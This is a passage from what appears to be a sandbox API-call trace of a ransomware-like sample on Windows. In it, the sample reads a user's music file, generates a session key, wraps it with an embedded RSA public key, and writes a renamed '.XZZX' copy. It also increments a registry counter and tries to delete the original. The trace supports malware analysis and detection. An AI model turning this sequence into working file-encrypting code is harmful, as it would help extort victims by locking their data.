nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.722] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175fe [0051.722] WriteFile (in: hFile=0x5f0, lpBuffer=0x48ef860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x48ef860*, lpNumberOfBytesWritten=0x48ee438*=0x22, lpOverlapped=0x0) returned 1 [0051.722] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17620 [0051.722] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.722] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17625 [0051.722] SetErrorMode (uMode=0x1) returned 0x1 [0051.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.722] OutputDebugStringW (lpOutputString="end") [0051.722] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x8e\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x48edbf4, pcbBinary=0x48ed3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x48edbf4, pcbBinary=0x48ed3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.722] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x48edbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x48ed3dc, pcbStructInfo=0x48ed3d8 | out: pvStructInfo=0x48ed3dc, pcbStructInfo=0x48ed3d8) returned 1 [0051.723] CryptAcquireContextW (in: phProv=0x48ed3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x48ed3e4*=0x4399b58) returned 1 [0051.723] CryptImportPublicKeyInfo (in: hCryptProv=0x4399b58, dwCertEncodingType=0x1, pInfo=0x42e0bb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0be0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0be8*, PublicKey.cUnusedBits=0x0), phKey=0x48ed3ec | out: phKey=0x48ed3ec*=0x3e285b8) returned 1 [0051.723] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.724] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.724] CryptEncrypt (in: hKey=0x3e285b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x48ed3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x48ed3f0*=0x80) returned 1 [0051.724] CryptEncrypt (in: hKey=0x3e285b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4399be0*, pdwDataLen=0x48ed3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4399be0*, pdwDataLen=0x48ed3e8*=0x80) returned 1 [0051.724] WriteFile (in: hFile=0x5f0, lpBuffer=0x4399be0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x4399be0*, lpNumberOfBytesWritten=0x48ee438*=0x80, lpOverlapped=0x0) returned 1 [0051.725] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.725] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.725] GetUserNameW (in: lpBuffer=0x48ee1f8, pcbBuffer=0x48edfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x48edfe0) returned 1 [0051.725] wsprintfW (in: param_1=0x48edff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.725] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48edfe4 | out: phkResult=0x48edfe4*=0x600) returned 0x0 [0051.725] RegQueryValueExW (in: hKey=0x600, lpValueName="E1010314", lpReserved=0x0, lpType=0x48edfd8, lpData=0x48edfec, lpcbData=0x48edfdc*=0x4 | out: lpType=0x48edfd8*=0x4, lpData=0x48edfec*=0x5b, lpcbData=0x48edfdc*=0x4) returned 0x0 [0051.725] RegCloseKey (hKey=0x600) returned 0x0 [0051.725] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48edfe8 | out: phkResult=0x48edfe8*=0x600) returned 0x0 [0051.725] RegSetValueExW (in: hKey=0x600, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x48edfec*=0x5c, cbData=0x4 | out: lpData=0x48edfec*=0x5c) returned 0x0 [0051.725] RegCloseKey (hKey=0x600) returned 0x0 [0051.725] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.726] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.726] CloseHandle (hObject=0x5f0) returned 1 [0051.732] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.733] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.733] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 0 [0051.733] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 0 Thread: id = 186 os_tid = 0xb08 [0050.731] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.731] lstrcpyW (in: lpString1=0x46cf460, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.731] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.731] SetErrorMode (uMode=0x1) returned 0x1 [0050.731] lstrcpyW (in: lpString1=0x46cf860, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.731] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0x694f337d, Data2=0x205f, Data3=0x455a, Data4=([0]=0xbc, [1]=0x16, [2]=0xdf, [3]=0x6e, [4]=0xe3, [5]=0xfd, [6]=0xd6, [7]=0x8b))) returned 0x0 [0050.731] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a") returned 57 [0050.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.731] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned 77 [0050.731] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="XZZX") returned 0x0 [0050.731] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a", dwFileAttributes=0x20) returned 1 [0050.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0050.732] ReadFile (in: hFile=0x5b8, lpBuffer=0x433e560, nNumberOfBytesToRead=0x175f9, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x433e560*, lpNumberOfBytesRead=0x46ce418*=0x175f9, lpOverlapped=0x0) returned 1 [0050.732] CloseHandle (hObject=0x5b8) returned 1 [0050.732] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e70000 [0050.733] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e80000 [0050.734] SetErrorMode (uMode=0x1) returned 0x1 [0050.734] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.734] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e437d8) returned 1 [0050.736] CryptGenKey (in: hProv=0x3e437d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e286b8) returned 1 [0051.829] CryptExportKey (in: hKey=0x3e286b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0051.829] CryptExportKey (in: hKey=0x3e286b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e80000, pdwDataLen=0x46ce41c | out: pbData=0x3e80000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0051.830] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.830] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.830] CryptDestroyKey (hKey=0x3e286b8) returned 1 [0051.830] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fad3bb6308c4fc66694f337d0d31e0ae.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0051.831] WriteFile (in: hFile=0x620, lpBuffer=0x433e560*, nNumberOfBytesToWrite=0x175f9, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x433e560*, lpNumberOfBytesWritten=0x46ce438*=0x175f9, lpOverlapped=0x0) returned 1 [0051.833] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175f9 [0051.833] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0051.834] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175fe [0051.834] WriteFile (in: hFile=0x620, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x22, lpOverlapped=0x0) returned 1 [0051.834] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17620 [0051.834] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0051.834] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17625 [0051.834] SetErrorMode (uMode=0x1) returned 0x1 [0051.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.834] OutputDebugStringW (lpOutputString="end") [0051.834] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.834] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0051.835] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x4399d78) returned 1 [0051.835] CryptImportPublicKeyInfo (in: hCryptProv=0x4399d78, dwCertEncodingType=0x1, pInfo=0x42e1230*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1260*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1268*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x3e286b8) returned 1 [0051.835] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.836] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.836] CryptEncrypt (in: hKey=0x3e286b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0051.836] CryptEncrypt (in: hKey=0x3e286b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4399e00*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4399e00*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0051.836] WriteFile (in: hFile=0x620, lpBuffer=0x4399e00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x4399e00*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0051.836] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.836] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0051.837] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0051.837] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.837] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x624) returned 0x0 [0051.837] RegQueryValueExW (in: hKey=0x624, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x5d, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0051.837] RegCloseKey (hKey=0x624) returned 0x0 [0051.837] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x624) returned 0x0 [0051.837] RegSetValueExW (in: hKey=0x624, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x5e, cbData=0x4 | out: lpData=0x46cdfec*=0x5e) returned 0x0 [0051.837] RegCloseKey (hKey=0x624) returned 0x0 [0051.837] VirtualFree (lpAddress=0x3e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.838] VirtualFree (lpAddress=0x3e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.838] CloseHandle (hObject=0x620) returned 1 [0051.842] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.843] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.843] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 0 [0051.843] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 0 Thread: id = 187 os_tid = 0xb44 [0050.946] lstrcpyA (in: lpString1=0x49efc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.946] lstrcpyW (in: lpString1=0x49ef460, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.946] lstrcpyW (in: lpString1=0x49ee860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.946] SetErrorMode (uMode=0x1) returned 0x1 [0050.946] lstrcpyW (in: lpString1=0x49ef860, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.946] CoCreateGuid (in: pguid=0x49ee440 | out: pguid=0x49ee440*(Data1=0x159fdf7f, Data2=0xffab, Data3=0x46e0, Data4=([0]=0xa1, [1]=0x50, [2]=0x78, [3]=0xfa, [4]=0xdd, [5]=0x23, [6]=0x1d, [7]=0x8))) returned 0x0 [0050.946] wsprintfW (in: param_1=0x49eec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a") returned 57 [0050.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x49efee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.946] wsprintfW (in: param_1=0x49ee450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned 77 [0050.947] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="XZZX") returned 0x0 [0050.947] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a", dwFileAttributes=0x20) returned 1 [0050.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0050.948] ReadFile (in: hFile=0x614, lpBuffer=0x4359870, nNumberOfBytesToRead=0x175f9, lpNumberOfBytesRead=0x49ee418, lpOverlapped=0x0 | out: lpBuffer=0x4359870*, lpNumberOfBytesRead=0x49ee418*=0x175f9, lpOverlapped=0x0) returned 1 [0050.948] CloseHandle (hObject=0x614) returned 1 [0050.948] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4290000 [0050.949] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x42a0000 [0050.949] SetErrorMode (uMode=0x1) returned 0x1 [0050.949] lstrcpyW (in: lpString1=0x49ee358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.949] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e43860) returned 1 [0050.957] CryptGenKey (in: hProv=0x3e43860, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e286f8) returned 1 [0051.663] CryptExportKey (in: hKey=0x3e286f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x49ee41c | out: pbData=0x0*, pdwDataLen=0x49ee41c*=0x94) returned 1 [0051.663] CryptExportKey (in: hKey=0x3e286f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x42a0000, pdwDataLen=0x49ee41c | out: pbData=0x42a0000*, pdwDataLen=0x49ee41c*=0x94) returned 1 [0051.663] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.664] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.664] CryptDestroyKey (hKey=0x3e286f8) returned 1 [0051.664] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B169CAD546C877A0159FDF7F4B675BE8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b169cad546c877a0159fdf7f4b675be8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0051.665] WriteFile (in: hFile=0x5c8, lpBuffer=0x4359870*, nNumberOfBytesToWrite=0x175f9, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x4359870*, lpNumberOfBytesWritten=0x49ee438*=0x175f9, lpOverlapped=0x0) returned 1 [0051.666] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 